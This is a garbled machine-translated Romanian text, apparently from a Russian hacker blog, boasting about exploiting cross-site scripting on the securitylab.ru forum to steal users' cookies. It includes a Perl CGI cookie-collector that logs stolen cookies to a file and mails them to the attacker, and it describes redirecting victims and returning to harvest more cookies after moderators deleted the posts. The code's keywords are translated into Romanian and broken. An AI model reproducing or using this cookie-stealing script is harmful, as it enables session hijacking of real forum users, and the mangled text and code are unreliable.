Așa cum a fost piratat sau cum se utilizează cross-site scripting

Totul a început cu faptul că într-un fel de gând să securitylab.ru
Am văzut articolul „News de la Shushpanchika“ cu privire la acest conținut:

Amintindu că Shushpanchik - un cap ((C)
Pupkin-Zade) decide să ia o plimbare pe URL`u și să vedem ce oamenii sunt acum răsfățat ...

Voi spune că nu am ca pe forum o dată: de lucru buggy-preglyuchno, teme trăznite (cel mai „cool“, tema în secțiunea de codificare: „că luchshe'i“ cine pe ce kodit „😉 și cu toate acestea se află în fruntea inscripția mândru în partea de sus a paginii

Forumul de securitate
Totul despre sistemele de securitate din Rusia ...

vulnerabilitate tipică este următoarea:

Ca urmare, ar trebui să o fereastră cu conținutul cookie-ul (scuze pentru microsoft.com este deja fixat un - un bun exemplu ar 😉

Ie dacă trimiteți un astfel de „surpriză“ în comunicarea sa, în locul imaginii, utilizatorul va vedea o fereastră cu un cuvânt foarte ofensiv ...

Mai mult, un utilizator este redirecționat către această adresă URL.

Acum, cum să scrie un script pentru colectarea de cookie-uri:

utilizați QW CGI (: standard);

$ Cookie = $ ENV;
$ File = »cook.txt»;
deschis (FILE, «>> $ fișier»);
imprimare de fișiere «$ cookie \ n \ n»;
închidere (fișier);
$ Query = CGI :: nou ();

$mail='[email protected] „;
$target='[email protected] „;
deschis (MAIL, «| $ mailprog -t»);
Print MAIL «Content-Type: text / plain \ n»;
MAIL Print «Subiect: Cookie Fresh \ n»;
Print MAIL «Pentru: $ email \ n»;
Print MAIL «De la: '. $ țintă' \ n \ n»;
Print MAIL «$ cookie»;
close (MAIL);

Astfel de glume au fost manivela de câteva ori și am dat peste ei ... moderatorii. Cred că după această gaură închisă? Oh, nu! Kul-haksory tocmai a fost eliminat mesajele mele. Le-am lăsat și sa întors pentru a colecta recolta „chifle“. Desigur, s-ar putea merge mai departe și să pătrundă în algoritmul pentru formarea unui forum bun apuca ... dar dacă știți ce funcționează cel puțin ar trebui să lase un mesaj pe acest „proiect privind siguranța“ în mod constant glyuchaschem ... Am uneori luat pe o jumătate de oră, chiar și pe acest simplu operație deoarece serverul tocmai a murit și a încetat să răspundă ... tot ... până la următoarea oră ...

Prin urmare, nimic nu într-adevăr nu se va schimba, dacă vom închide mesajul, de exemplu, o „surpriza“:

Crede-mă, îmi place kulhaksory ICQ șase cifre gratuit ...

Arată acest articol unui prieten: